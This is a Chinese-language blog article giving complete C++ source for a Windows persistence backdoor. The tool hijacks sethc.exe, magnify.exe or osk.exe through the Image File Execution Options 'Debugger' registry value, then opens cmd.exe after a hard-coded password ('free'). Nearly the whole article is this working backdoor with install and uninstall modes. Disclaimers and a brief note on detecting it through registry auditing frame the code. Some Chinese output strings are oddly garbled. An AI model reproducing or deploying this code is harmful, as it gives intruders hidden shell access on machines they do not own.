C++ 映像劫持（Image File Execution Options）後門實例剖析。本站提示：本文僅供學習參考，不一定能達到您預期的結果。以下是正文。
本文以實例講述 C++ 透過 Image File Execution Options（映像劫持）的 Debugger 值植入後門的方法，並附上完整原始碼供大家參考。請注意：寫入該 HKLM 登錄檔鍵需要管理員權限，此技術屬於持久化後門而非提權，且很容易被登錄檔稽核偵測；僅供學習研究。具體如下：
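// freeheart.cpp : Defines the entry point for the console application.
// For study and exchange only; anyone using it unlawfully bears the consequences.
// by: cnblogs.com/blogg  time 2013.5.24
//
// Command line:
//   argv[0] = freeheart.exe
//   argv[1] = -i (install) | -u (uninstall) | anything else -> password prompt
//   argv[2] = name.exe   (install: file name the payload is copied to)
//             1 | 2 | 3  (uninstall: which hijack to remove)
//   argv[3] = 1 | 2 | 3  (install: which accessibility program to hijack)
//
// Technique: Image File Execution Options (IFEO) hijack.  A subkey named after
// the target program is created under
//   HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
// and its REG_SZ "Debugger" value is pointed at a copy of this program, so the
// loader starts this program (with the target's own command line appended)
// whenever the target is launched.
//
// NOTE(review): writing under HKLM requires administrative rights, so this is a
// persistence backdoor, not a privilege escalation.  The "password" below is a
// hard-coded clear-text string; it is not a security control.  Defenders can
// detect this family by alerting on creation of any IFEO\<name>\Debugger value
// (registry auditing / Sysmon RegistryEvent) and by inspecting the Debugger
// entries of sethc.exe, magnify.exe and osk.exe.
//
// Review fixes relative to the original listing:
//   - `cin >> shuruPwd` wrote into a 1-byte string literal (overflow / UB);
//     input now goes into a std::string.
//   - RegSetValueEx wrote a fixed 50 bytes of argv[2], reading past the end of
//     short names; the size is now strlen+1.
//   - xiezai() strcat'ed into the string literal holding the key path and
//     leaked a `new BYTE[256]`; it now builds paths with std::string and
//     closes only handles it actually opened.
//   - Every Win32 call result is checked and reported instead of ignored.
#include "stdafx.h"
#include "windows.h"
#include "atlbase.h"
#include <cstring>
#include <iostream>
#include <string>

using namespace std;

// Install / uninstall helpers (defined below main).  Parameters widened to
// const char* so literals can be passed without the deprecated char*
// conversion; callers that pass char* still compile.  Each returns true on
// success so main can report failures instead of claiming success blindly.
bool anzhuang(const char *Path, const char *filename);
bool xiezai(const char *path, const char *hName);
bool CopyZiji(const char *CopyPath);

// Registry path every install / uninstall step hangs off.
static const char *const kIfeoKey =
    "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options";

// Programs hijacked by menu choices 1..3.
static const char *const kSethc   = "sethc.exe";    // Sticky Keys (Shift x5) helper
static const char *const kMagnify = "magnify.exe";  // Magnifier
static const char *const kOsk     = "osk.exe";      // On-screen keyboard

// Maps a "1"/"2"/"3" selection to the program it hijacks; NULL for anything else.
static const char *targetForChoice(const char *choice)
{
    if (strcmp(choice, "1") == 0) return kSethc;
    if (strcmp(choice, "2") == 0) return kMagnify;
    if (strcmp(choice, "3") == 0) return kOsk;
    return NULL;
}

// Fills `out` with the system directory plus a trailing backslash
// (e.g. "C:\Windows\system32\").  Returns false if the lookup fails or the
// result would not fit; the original appended to an unchecked buffer.
static bool systemDirectory(string &out)
{
    char buf[MAX_PATH] = {0};
    UINT n = GetSystemDirectory(buf, MAX_PATH);
    if (n == 0 || n >= MAX_PATH) return false;
    out = string(buf) + "\\";
    return true;
}

// Install: copy this executable to <sysdir>\<payloadName>, then register it as
// the IFEO Debugger for `target`.  The copy happens first so a failed copy
// never leaves a Debugger value pointing at a file that does not exist.
static int installHijack(const char *payloadName, const char *target)
{
    string sysdir;
    if (!systemDirectory(sysdir)) {
        cout << "取得系統目錄失敗!" << endl;
        return 1;
    }
    string dest = sysdir + payloadName;
    if (!CopyZiji(dest.c_str())) {
        cout << "複製檔案失敗: " << dest << endl;
        return 1;
    }
    // The Debugger value holds the bare file name, exactly as the original
    // did; the loader resolves it through its search path (which includes the
    // system directory) and xiezai() rebuilds <sysdir>\<name> from it.
    if (!anzhuang(payloadName, target)) {
        cout << "寫入登錄檔失敗!" << endl;
        return 1;
    }
    cout << "創立完成! : " << dest << endl;
    return 0;
}

// Uninstall: remove the IFEO subkey for `target` and delete the payload file
// it pointed at.
static int removeHijack(const char *target)
{
    string sysdir;
    if (!systemDirectory(sysdir)) {
        cout << "取得系統目錄失敗!" << endl;
        return 1;
    }
    if (!xiezai(sysdir.c_str(), target)) {
        cout << "卸載失敗!" << endl;
        return 1;
    }
    cout << "刪除文件勝利!" << endl;
    return 0;
}

int main(int argc, char *argv[])
{
    const string password = "free";  // hard-coded clear-text "connection password"

    if (argc > 1) {
        // --- install: freeheart.exe -i <name.exe> <1|2|3>
        if (strcmp(argv[1], "-i") == 0) {
            if (argc < 3) {
                cout << "請輸出文件名!";
                return 0;
            }
            const char *target = (argc > 3) ? targetForChoice(argv[3]) : NULL;
            if (target == NULL) {
                cout << "請輸出參數!" << endl;
                return 0;
            }
            return installHijack(argv[2], target);
        }

        // --- uninstall: freeheart.exe -u <1|2|3>
        if (strcmp(argv[1], "-u") == 0) {
            const char *target = (argc > 2) ? targetForChoice(argv[2]) : NULL;
            if (target == NULL) {
                cout << "請輸出參數!" << endl;
                return 0;
            }
            return removeHijack(target);
        }

        // Any other argv[1] means we were started through the IFEO Debugger
        // value: the loader runs "<this exe> <original target path> ...", so
        // argv[1] is the hijacked program's path rather than -i/-u.  Three
        // attempts at the password, then a cmd.exe inheriting whatever
        // security context launched the hijacked program.
        int errors = 0;
        string input;
        while (errors < 3) {
            cout << "password:";
            if (!(cin >> input)) break;  // stdin closed: stop instead of spinning
            if (input == password) {
                system("cmd.exe");
                break;
            }
            cout << "暗碼毛病!" << endl;
            ++errors;
        }
        return 0;
    }

    // No arguments: usage banner.
    system("color a");
    cout << "-----------------------------------------------------" << endl;
    cout << "迎接惠臨自在的心,祝您好運!" << endl;
    cout << "1: sethc.exe Shift後門\n";
    cout << "2: magnify.exe 縮小鏡後門\n";
    cout << "3: osk.exe 屏幕鍵盤後門\n";
    cout << "-----------------------------------------------------" << endl;
    cout << "裝置: freeheart.exe -i xx.exe 1" << endl;
    cout << "卸載: freeheart.exe -u 1" << endl;
    cout << "銜接暗碼:free" << endl;
    cout << "-----------------------------------------------------" << endl;
    return 0;
}

// Install function: creates IFEO\<filename> and sets its "Debugger" value to
// `Path`.  Returns true only if the value was written.
bool anzhuang(const char *Path, const char *filename)
{
    HKEY root = NULL;
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, kIfeoKey, 0, KEY_WRITE | KEY_READ, &root) != ERROR_SUCCESS)
        return false;

    bool ok = false;
    HKEY sub = NULL;
    if (RegCreateKeyEx(root, filename, 0, NULL, REG_OPTION_NON_VOLATILE,
                       KEY_WRITE | KEY_READ, NULL, &sub, NULL) == ERROR_SUCCESS) {
        // REG_SZ size must include the terminator and nothing more; the
        // original passed a fixed 50, reading past the end of short names.
        DWORD cb = static_cast<DWORD>(strlen(Path) + 1);
        ok = RegSetValueEx(sub, "Debugger", 0, REG_SZ,
                           reinterpret_cast<const BYTE *>(Path), cb) == ERROR_SUCCESS;
        RegCloseKey(sub);
    }
    RegCloseKey(root);
    return ok;
}

// Uninstall function: `hName` is the hijacked program's name.  Reads back the
// Debugger value, deletes the IFEO\<hName> key, then deletes <path><value>.
// Returns false if the key could not be removed or the payload file could not
// be deleted.
bool xiezai(const char *path, const char *hName)
{
    HKEY root = NULL;
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, kIfeoKey, 0, KEY_WRITE | KEY_READ, &root) != ERROR_SUCCESS)
        return false;

    // Read the Debugger value so we know which payload file to delete.
    string subkey = string(kIfeoKey) + "\\" + hName;
    char value[MAX_PATH] = {0};
    bool haveValue = false;
    HKEY target = NULL;
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, subkey.c_str(), 0, KEY_READ, &target) == ERROR_SUCCESS) {
        DWORD type = REG_SZ;
        DWORD len = sizeof(value) - 1;  // leave room: REG_SZ may arrive unterminated
        haveValue = RegQueryValueEx(target, "Debugger", NULL, &type,
                                    reinterpret_cast<LPBYTE>(value), &len) == ERROR_SUCCESS
                    && type == REG_SZ;
        RegCloseKey(target);  // close before deleting the key it refers to
    }

    // Remove the hijack first: even if the file delete below fails, the
    // target program is no longer redirected.
    bool ok = RegDeleteKey(root, hName) == ERROR_SUCCESS;
    RegCloseKey(root);

    if (haveValue) {
        string file = string(path) + value;
        if (!DeleteFile(file.c_str())) ok = false;
    }
    return ok;
}

// Copies the running executable to `CopyPath`.  Returns false if the module
// path cannot be determined or CopyFile fails (including when the destination
// already exists: bFailIfExists stays TRUE as in the original).
bool CopyZiji(const char *CopyPath)
{
    char self[MAX_PATH] = {0};
    DWORD n = GetModuleFileName(NULL, self, MAX_PATH);
    if (n == 0 || n >= MAX_PATH) return false;  // failed or truncated
    return CopyFile(self, CopyPath, TRUE) != 0;
}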
希望本文所述對大家的 C++ 程式設計有所幫助。再次提醒：IFEO 的 Debugger 值是公開且廣為人知的持久化手法，請只在自己擁有的測試環境中實驗。